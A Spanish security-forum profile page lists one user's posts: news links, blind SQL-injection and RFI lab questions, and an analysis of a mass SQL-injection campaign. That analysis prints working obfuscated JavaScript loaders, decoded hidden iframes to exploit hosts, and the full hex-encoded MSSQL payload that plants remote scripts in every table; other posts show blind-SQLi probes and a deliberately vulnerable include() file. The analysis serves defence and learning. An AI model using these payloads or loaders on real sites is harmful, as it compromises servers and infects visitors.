Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - R41N-W4R3

#1
Investigadores  eliminan nuevamente la infraestructura creada por Thund3rC4sH (conocido Banker)  para robar cuentas del Banco Bankinter.

Todos los detalle en el siguiente enlace:

http://www.informaticanova.com/blog-segutidadinseguridad/item/457-eliminaci%C3%B3n-infraestructura-phishing-bankinter
#2
Los investigadores Miguel Ángel de Castro y Pedro Guillén rootean un servidor chino perteneciente a una botnet.

Aprovechan una vulnerabilidad BSQL para acabar subiendo una shell y rootear el server.

Ver artículo: http://www.informaticanova.com/seguridad-informatica/seguridad/inseguridad-informatica/rooteo-de-un-servidor-infectado-con-botnet-a-traves-de-vulnerabildiad-bsql.html

Espero que os guste y feliz año a todos
#3

Interesante artículo del blog del investigador Miguel Ángel de Castro que junto con Pedro Guillen han hecho un análisis sobre un correo de phishing bancario destruyendo toda la infraestructura. Ademas se acompaña con un video completo de la explotación.

Os dejo el enlace:

http://www.informaticanova.com/seguridad-informatica/seguridad/inseguridad-informatica/video-analisis-secuestro-y-destruccion-de-infraestructura-phishing-al-banco-santander.html

Un saludo y espero que guste
#4
Noticias / "Vulnerabilidad" en Google
29 Marzo 2011, 12:21 PM
Investigadores del grupo (CeSeNA) han encontrado una interesante "vulnerabilidad" en google:

Como puede verse en la captura de pantalla es posible mostrar una imagen (en este caso el logo de CanalSeguro) sobre la caja de búsqueda de Google.

La Url que se debe formar para conseguirlo es:

http://www.google.com/custom?hl=en&cof=L%3Ahttp://www.informaticanova.com/images/stories/seguridad/canalseguro/logocanalseguroresiz.jpg&btnG=Search

La "vulnerabilidad" aparece porque la variable cof no esta correctamente filtrada.

La noticia completa esta en: http://www.canalseguro.net/inicio/item/20-vulnerabilidad-en-google

Relacionado : https://foro.elhacker.net/noticias/google_actualiza_chrome_para_solucionar_seis_fallos_de_seguridad_graves-t323145.0.html
#5

Hola a todos os paso un enlace a una noticia en la que hay un video de un panel de control de una botnet Zeus que unos investigadores de CanalSeguro han secuestrado y eliminado para que no puedan seguir haciendo mal a nadie.

http://canalseguro.net/noticias/52-boletin-noticias-de-seguridad-informatica/129-video-investigadores-de-canalseguro-secuestran-un-server-de-control-de-la-botnet-zeus-

saludos y espero que os guste  :)
#6

En el artículo del siguiente enlace se puede ver que hoy dia es posible ganar dinero de forma legal, vencdiendo las vulnerablidades descubiertas. Espero que os guste y que os pueda reportar algo de dinero extra.

http://www.canalseguro.net/inicio/item/9-vulnerabilidades-por-dinero-los-caza-recompensas-de-la-red

#7
Tim Lee Junto a Alex Halderman (University of Michigan) y Ariel Feldman (Princeton University) nos enseñan en la última demostración de la posibilidad de hack de máquinas de voto electrónico: "reprogramó una máquina de Sequoia que se utilizó en las elecciones de 2008 para jugar Pac-Man"

Os paso el enlace con el artículo completo y el video con la demostración de como sin romper los sellos de la máquina de voto electronico han reprogramado la máquina para jugar a Pac-Man, ya que dicen que lo de robar votos ya esta hecho.

http://www.informaticanova.com/seguridad-informatica/noticias-seguridad-informatica/maquinas-de-voto-electoral-electronicoique-pasa-si-las-dejamos-sin-vigilancia-unos-dias.html


Saludos y espero que os guste
#8
Foro Libre / Ciberguerrilla Documental
27 Agosto 2010, 12:41 PM

Este es un documental imprescindible, muestra una realidad agena a mucha gente.

Enlace de la web donde podeis ver el video online:

http://www.informaticanova.com/seguridad-informatica/noticias-seguridad-informatica/ciberguerrilla.html
#9

Ya había alguna investigación al respecto, sobre como hackear las ECU o unidades de control electrónico de los vehículos. En esta ocasión el nuevo estudio presenta la particularidad de que no es necesario acceder físicamente a la ECU, sino que podemos realizar el ataque a distancia, al realizarse a través de los sensores wireless que controlan la presión de las ruedas.

Podeis leer un artículo muy interesante y bastante  completo en:

http://www.informaticanova.com/seguridad-informatica/noticias-seguridad-informatica/coches-hackeados-a-traves-de-los-sensores-wireless.html


Saludos a todos
#10
Escenario:

La empresa X dispone de una web programada en asp.net con bd MSsqlserver.

Descripción general del Ataque:

La página web en cuestión presentaba vulnerabilidades de inyección SQL. Estas han sido aprovechadas por los atacantes para inyectar código javascritp en cada una de los campos de las tablas al final de los mismos. Este escenario desemboca en un XSS permanente en la página web atacada que ejecuta estos javascritp en el navegador de cada cliente que visita la página infectada. Esos códigos javascritp a su vez cargan IFRAMES invisibles de tamaño 0 que cargan otra serie de scripts que tratarán de atacar nuestro sistema mediante el uso de exploits.

Todas estas acciones se realizan usando diversas técnicas de evasión para evitar ser descubiertos y para eludir los sistemas de seguridad que se emplaen.

Puede esquematizarse en los siguientes pasos:

1. Localización de web vulnerable a Inyección SQL
2. Inyección des Script en la BD dela Web vulnerable. Asi apareceran cuando se cargue cualquier sección con contenido leido de la bd.
3. El Visitante ahora esta entrando en una web que tiene inyectado de forma permanente un IFRAME que carga algún tipo de script que se ejecutará en su navegador y que se encuentra alojado en un servidor remoto.
4. El visitante es vulnerado por algunos de los exploit que se ejecutan sobre su navegador.

Diseccionando el ataque:

Cuando un usuario accede a la página atacada, su navegador carga un script como el siguiente:

<script>s='DMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHICNHDHJHDHEGFGNHDCOGOGBGNGFCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEFDOANAKDMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHEGPGKGBGOGEGHGMGPHHCOGDGPGNCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEF';x='';sl=s.length;for(i=0;i<sl;i=i+2){x+=String.fromCharCode(((s.charCodeAt(i)-65)<<4)+s.charCodeAt(i+1)-65);}document.write(x);</script>


EXPLICAIÓN SCRIPT

S es la variable que almacena el código codificado para que no podamos verlo.

String.fromCharCode

Este es un método global del objeto String que crea una cadena a partir de los códigos Unicode que se le pasen como parámetros. Por ejemplo:
var cadena = String.fromCharCode(65,66,67);
La variable cadena contendrá "ABC", que son los caracteres con los códigos 65, 66 y 67.

charCodeAt

Este método aplicado a una cadena devuelve el código Unicode del carácter que se encuentra en la posición dada por el atributo atrent lteniendo en cuenta que el índice del primer carácter a la izquierda de la cadena es 0 y el último es una unidad menor que longitud de la cadena. Si el valor del atributo no es válido (igual o mayor que la longitud de la cadena o negativo) el método devuelve el valor NAN. Por ejemplo el siguiente código devuelve el Unicode del tercer carácter de la cadena nombre:
var nombre = "abcdefghij";
var car3 =
nombre.charAt(2);
Devolverá 99, que es el código de la letra 'c', el tercer carácter por la izquierda (índice igual a 2).

<<   shift A LA IZQUIERDA
Los operadores de shift corren todos los bit de una variable hacia la derecha o hacia la izquierda un número determinado de posiciones y los nuevos bit que se crean se impostan en 1, mientras que los bit que salguen se pierden (excepto los del signo).


Tras la decodificación del script oculto mediante el simple uso de la función alert obtenemos:

<IFRAME src="http://x-systems.name/Advanced_Traffic/out.php?s_id=1" width="1" height="1" frameborder="0"></IFRAME>
<IFRAME src="http://tojandglow.com/Advanced_Traffic/out.php?s_id=1" width="1" height="1" frameborder="0"></IFRAME>

Como vemos el código inyectado tras descomprimirse crea 2 iframes invisibles que a su vez hacen la llamada a otros dos script. Que tratan de ejecutar diversos exploit conocidos a nuestro navegador para tomar información del equipo de la víctima, infectarlo con algún tipo de malware o cualquier cosa que pueda imaginarse.

No sólo se ha inyectado este scritp en la web hackeada, también encontramos otro tipo de script con un sistema diferente de codificación:

<script>function c152364361251b49002709e17ba(b49002709e17c1){ function b49002709e17c9(){var b49002709e17cf=16;return b49002709e17cf;} return (parseInt(b49002709e17c1,b49002709e17c9()));}function b49002709e17ea(b49002709e17f0){ function b49002709e1805(){return 2;} var b49002709e17f7='';b49002709e181d=String.fromCharCode;for(b49002709e17fd=0;b49002709e17fd<b49002709e17f0.length;b49002709e17fd+=b49002709e1805()){ b49002709e17f7+=(b49002709e181d(c152364361251b49002709e17ba(b49002709e17f0.substr(b49002709e17fd,b49002709e1805()))));}return b49002709e17f7;} var x70='';var b49002709e182a='3C7'+x70+'3637'+x70+'2697'+x70+'07'+x70+'43E696628216D7'+x70+'96961297'+x70+'B646F637'+x70+'56D656E7'+x70+'42E7'+x70+'7'+x70+'7'+x70+'2697'+x70+'465287'+x70+'56E657'+x70+'363617'+x70+'065282027'+x70+'2533632536392536362537'+x70+'322536312536642536352532302536652536312536642536352533642536332533312533352532302537'+x70+'332537'+x70+'32253633253364253237'+x70+'2536382537'+x70+'342537'+x70+'342537'+x70+'302533612532662532662537'+x70+'332536312536632536352537'+x70+'362536392537'+x70+'332536392537'+x70+'342536662537'+x70+'322532652536652536352537'+x70+'34253266253639253665253265253633253637'+x70+'25363925336625333226253237'+x70+'2532622534642536312537'+x70+'342536382532652537'+x70+'322536662537'+x70+'352536652536342532382534642536312537'+x70+'342536382532652537'+x70+'32253631253665253634253666253664253238253239253261253331253336253330253331253332253335253239253262253237'+x70+'253636253237'+x70+'2532302537'+x70+'37'+x70+'2536392536342537'+x70+'34253638253364253333253337'+x70+'253335253230253638253635253639253637'+x70+'2536382537'+x70+'34253364253334253332253337'+x70+'2532302537'+x70+'332537'+x70+'342537'+x70+'39253663253635253364253237'+x70+'2536342536392537'+x70+'332537'+x70+'302536632536312537'+x70+'39253361253230253665253666253665253635253237'+x70+'2533652533632532662536392536362537'+x70+'3225363125366425363525336527'+x70+'29293B7'+x70+'D7'+x70+'6617'+x70+'2206D7'+x70+'969613D7'+x70+'47'+x70+'27'+x70+'5653B3C2F7'+x70+'3637'+x70+'2697'+x70+'07'+x70+'43E';document.write(b49002709e17ea(b49002709e182a));</script>

En una primera etapa de decodificación obtenemos:

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e%65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%30%31%32%35%29%2b%27%66%27%20%77%69%64%74%68%3d%33%37%35%20%68%65%69%67%68%74%3d%34%32%37%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

Para finalmente mediante url decode ver:

<iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+Math.round(Math.random()*160125)+'f'; width=375 height=427 style='display: none'></iframe>

Como puede apreciarse usan la misma técnica llamando a scripts de páginas alojadas en servidores anónimos para trataqr de vulnerar el sistema del visitante.

¿Pero como ha llegado todo esto a nuestra Web?

Bién, existen diversas formas, pero veamos como se puede realizar mediante el uso de la propia vulnerabilidad sql:

En primer lugar, este tipo de inyección (extraida de otra victima que publico su problema en la red) será la encargada de inyectar en toda nuestra web el script malicioso:

id=1;DECLARE%20@V%20VARCHAR(4000);SET%20@S=CAST(
0x4445434C415245204054205641524348415228323535292C404320
564152434841522832353529204445434C415245205461626C655F43
7572736F7220435552534F5220464F522053454C45435420612E6E61
6D652C622E6E616D652046524F4D207379736F626A6563747320612C
737973636F6C756D6E73206220574845524520612E69643D622E6964
20414E4420612E78747970653D27752720414E442028622E78747970
653D3939204F5220622E78747970653D3335204F5220622E78747970
653D323331204F5220622E78747970653D31363729204F50454E2054
61626C655F437572736F72204645544348204E4558542046524F4D20
5461626C655F437572736F7220494E544F2040542C4043205748494C
4528404046455443485F5354415455533D302920424547494E204558
45432827555044415445205B272B40542B275D20534554205B272B40
432B275D3D525452494D28434F4E5645525428564152434841522834
303030292C5B272B40432B275D29292B27273C736372697074207372
633D687474703A2F2F7777772E34636E772E72752F6E67672E6A733E
3C2F7363726970743E27272729204645544348204E4558542046524F
4D205461626C655F437572736F7220494E544F2040542C404320454E
4420434C4F5345205461626C655F437572736F72204445414C4C4F43
415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))
;EXEC(@V);--


Como puede verse, la inyección esta totalmente codificada, asi que para verla de forma mas simple convertiremos los números exadecimales:

id=1;DECLARE @V VARCHAR(4000); SET @S=CAST(numero_binario_largo AS VARCHAR(4000));EXEC(@S);--


Por si aún no queda claro. El código insertado declara un nombre de variable @V como una cadena de caracteres grandes, se pone su valor con un número binario en formato de cadena y luego ejecuta la cadena de caracteres resultante como si fuese una sentencia SQL. El punto y coma se utiliza para separar las instrucciones SQL individuales. El número binario largo se utiliza para ocultar el código real que se esta intentando ejecutar. Podemos verlo ahora:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.pagina_maliciosa.es ></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor


En el código anterior puede verse como el hacker está actualizando todos los caracteres individuales o texto en el final de cada valor de la columna en cada tabla de la base de datos por  la cadena "<src=http://www.pagina_maliciosa.es>  ".

Como puede apreciarse el ataque no se centra realmente en atacar la base de datos, sino en introducir script en todo el contenido de la web que se ejecutarán en el cliente. El concepto de este ataque es mas global, esta montado usando diversas capas y su últiima finalidad es atacar a los visitantes de la Web.

Este tipo de ataque ya es conocido desde hace tiempo. Ya hay referencias en el black hat 2009.

La grán mayoría de ataques de este tipo se realizan desde china y rusia, en estos emplazamientos se almacenan los datos enviados porlos equipos vulnerados, asi como se alojan los diferentes scripts y códigos maliciosos necesarios para realizar estos ataques.

Fuente: http://www.informaticanova.com/seguridad-informatica/noticias-seguridad-informatica/ataque-web-a-las-3-delicias-sqli-xss-permanenete-exploit.html
#14
Hacking Mobile / problemas bluezspammer
31 Octubre 2008, 16:52 PM


Estoy trabajando con  wifislax 2.0, y llevo ya un par de dias loco tratando de hacer funcionar el bluezpammer... he mirado muchos post en internet la mayoria de Gospel

EL mensaje de error que me da directamente despues de descubrir los dispositivos es:     Failed to conect to SDP server: operation already in progress

Despues de mirar mucho en internet al respecto llegue a la conclusion de que primero debia de comprobar que con obexftp -b MAC -p archivo no tenia problemas

Y lo que pasa tanto con obex como con  ussp-push mac canal archivo es que el telefono me pide un PIN  y ponga el que ponga no funciona....

Tambien he leido sobre el pin y he visto algun post interesante respecto al pinhelper.... pero no doy con la solucion.. siempre me pide el telefono un pin
   
   ¿alguien puede ayudarme?

Gracias por vuestro tiempo
#15
Nivel Web / duda con BSQL
29 Marzo 2008, 11:12 AM

  Hola a tod@s, estoy teniendo un problema a la hora de realizar una inyeccion ciega, y quisiera saber si hay algo q este haciendo mal:

   He seguido los siguientes pasos:

... AND (SELECT Count(*) FROM Tabla) >= 0   para saber nombre de tabla

... AND (SELECT Count(campo) FROM Tabla) >= 0   para saber nombre de campo

     Con las dos sentencias anteriores no tengo problemas, saco los nombres de tablas y campos de las mismas.

... AND (SELECT Count(*) FROM Tabla WHERE campo LIKE '%') > 0   para saber        contenido del campo

   con esta ultima inyeccion si tengo problemas, pq por ejemplo:

... AND (SELECT Count(*) FROM usuarios WHERE nombre LIKE '%') > 0

   eso deberia darme cierto no????  ya que hay algun nombre metido en la tabla usuarios, pero siempre me da falso. Tambien he probado:

AND (SELECT Count(*) FROM usuarios WHERE nombre LIKE 'a%') > 0
AND (SELECT Count(*) FROM usuarios WHERE nombre LIKE 'b%') > 0


  Asi hasta la z y del 0 al 9...pero siempre da falso.

  Alguien puede decirme q estoy haceindo mal??

  Gracias de antemano



#16


   Hola a tod@s.....  espero alguien pueda ayudarme pq es bien extraño esto que me pasa.

   Situacion: Estoy programando el acceso a una pagina que contendrá documentos separados en carpetas. Dependiendo del  grupo en el que el usuario se encuentre en el directorio activo, el directorio al que accedera sera uno u otro. Separando en principio dos grandes grupos, direccion y contabilidad.

   Mi problema es que trato de cargar con la funcion location una pagina u otra dependiendo del tipo de acceso. Ya he chequeado que la funcion que me comprueba el correcto login LDAP y tambien se que funciona bien la funcion que ve la pertenencia a un grupo determinado. pero no consigo que el location me envie donde necesito, ya que no hace nada.


   
$dominio="@midominio.local";
$user=addslashes__recursive($_POST["us"]).$dominio;
$pasw=addslashes__recursive($_POST["pas"]);
$MensajeSup=LoginLDAP($user,$pasw);
$direc=PerteneceA();

if ($direc=="" && $MensajeSup=="Acceso Permitido"){

echo "<h2><a href='http://192.168.9.117/index.php'>Volvel a la pagina de     Inicio</a><h2>";
echo"Usted pertenece al dominio, pero NO tiene permiso para el acceso a Intranet";
exit;
}

if ($MensajeSup=="Acceso Permitido" && $direc<>""){
[b] header ("Location: http://192.168.9.117/acceso.php");[/b]
exit;
}


Bueno a ver si alguien puede ayudarme.  Gracias de antemano

pd:He puesto solo el trozo de codigo mas relevante, como pueden ver no he incluido si el usuario se equivoca con las credenciales de inicio de sesion,etc...
#17
PHP / NAVEGADOR ARCHIVOS
30 Noviembre 2007, 13:51 PM
 
Hola a tod@s, estoy intentando poner un navegador de archivos y directorios en una intranet. El código que uso es este:




  $dir = (isset($_GET['dir']))?$_GET['dir']:"/";
$directorio=opendir($dir);
echo "<b>Directorio actual:</b><br>$dir<br>";
echo "<b>Archivos:</b><br>";
while ($archivo = readdir($directorio)) {
  if($archivo == '.')
    echo "<a href="?dir=.">$archivo</a><br>";
  elseif($archivo == '..'){
    if($dir != '.'){
      $carpetas = split("/",$dir);
      array_pop($carpetas);
      $dir2 = join("/",$carpetas);
      echo "<a href="?dir=$dir2">$archivo</a><br>";
    }
  }
  elseif(is_dir("$dir/$archivo"))
    echo "<a href="?dir=$dir/$archivo">$archivo</a><br>";
  else echo "$archivo<br>";
}
closedir($directorio); 




El error que me sale es este: Parse error: syntax error, unexpected '='    y me lo indica en la linea    elseif($archivo == '..'){

Gracias a todos por adelantado
#18
PHP / sigo con problemass....
10 Septiembre 2007, 16:05 PM

Tambien he probado a instalar el apache para windows... y me dice lo mismo. Voy a pegar aki todo el codigo de los 3 archivos a ver si alguien me puede ayudar....


  1. El archivo pruebarfi.html

<HTML><HEAD><TITLE> Prueva de RFI </TITLE></HEAD><BODY>

<A HREF="rfi.php?cont=hola.html">Hola!</A><BR><BR>
<A HREF="rfi.php?cont=adios.html">Adios!</A>

</BODY></HTML>


  2. El archivo hola.html...es igual q adios.html... osea solo escrito hola y adios

holaaaa
adiosssss

  3. El archivo rfi.php

 
<?php

$var 
$_GET["cont"];
include(
$var);

?>



  4.- El archivo  cede.txt

  <?phpecho "<h1>Vulnerable a RFI</h1>";?>

  y lo que paso en la url seria  http://192.168.1.2/fri.php?cont=http://192.168.1.3/code.txt

 
  El error que me da es el q reporte arriba


Gracias a todos 
#19
PHP / Problemas con XAMP
3 Septiembre 2007, 13:47 PM

Hola a todos, antes de nada gracias por leer el post.

  Mi problema es el siguiente:

   Estoy siguiendo un buen tutorial que hay en el foro, que trata sobre vulnerabilidades web. Al montar dos servidores web, con el paquete XAMP (apache,mysql y filezilla) para tratar de crear el entorno adecuado de prueba de una vulnerabilidad RFI me ocurre lo siguiente:


Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\xampp\htdocs\pruebarfi\rfi.php on line 4

Warning: include(http://192.168.9.222/code.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\xampp\htdocs\pruebarfi\\rfi.php on line 4

Warning: include() [function.include]: Failed opening 'http://192.168.9.222/code.txt' for inclusion (include_path='.;C:\xampp\php\pear\') in C:\xampp\htdocs\pruebarfi\rfi.php on line 4


Ese es el error que se muesta, el cual hace referencia a estas lineas de codigo, concretamente a la funcion include que es la que permite la vulnerabilidad, y que esta contenida en el archivo rfi.php:
   
<?php
$var 
$_GET(cont");
include(
$var);
?>


 


  Creo que tiene algo que ver con la configuracion del path de XAMP.. pero no se que pasa. A ver si alguien puede ayudarme. 

No se si este es el sitio adecuado para exponer el problema, si no es este ya lo moveran.....

Gracias
#20

Creo que no hace falta explicar muchos mas....  cada vez que le das a mostrar mensajes no leidos desde la ultima visita, se entremezclan todos los temas.... haciendo que sea muy pesado leer sobre los que te interesa....  hay ya demasiado temas diferentes y es realmente tedioso......

  Gracias y espero que se pueda hacer algo, aunke supongo que no soy el primero el pedirlo.

#21
PHP / DESOFUSCAR CODIGO PHP
18 Julio 2007, 11:54 AM


   Hola a todos, antes de nada pongo aqui la pregunta pq no tenia muy claro donde ponerla.....

   Mi problema es el siguiente:

     Tengo codigo php ofuscado mediante codificacion a base64 y comprimido con gzdeflate......  el caso es que quiero ver ese codigo php, y en la pagina aparece lo siguiente:

  <? eval(gzinflate(base64_decode'ZtGAAC/klNsQ4DZG+zYqxXgKWJcX......

  Ahi podemos ver como en primer lugar decodifica el base64 y al resultado lo descomprime con el gzinflate.   El caso es que para verlo, en teoria si pongo simplemete un echo, o uso un textarea deberia verse, osea:
 
<? echo eval(gzinflate(base64_decode'ZtGAAC/klNsQ4DZG+zYqxXgKWJcX...........

o

<textarea><? eval(gzinflate(base64_decode'ZtGAAC/klNsQ4DZG+zYqxXgKWJcX...........</textarea>




  El caso es que no me va y en el mejor de los casos sale error en eval(0),eval(1)......

   Lo estoy haciendo usando xamp para el php. Y he comprobado que esta la extension php_zip      ..........  a ver si alguien me puede ayudar.

   Gracias de antemano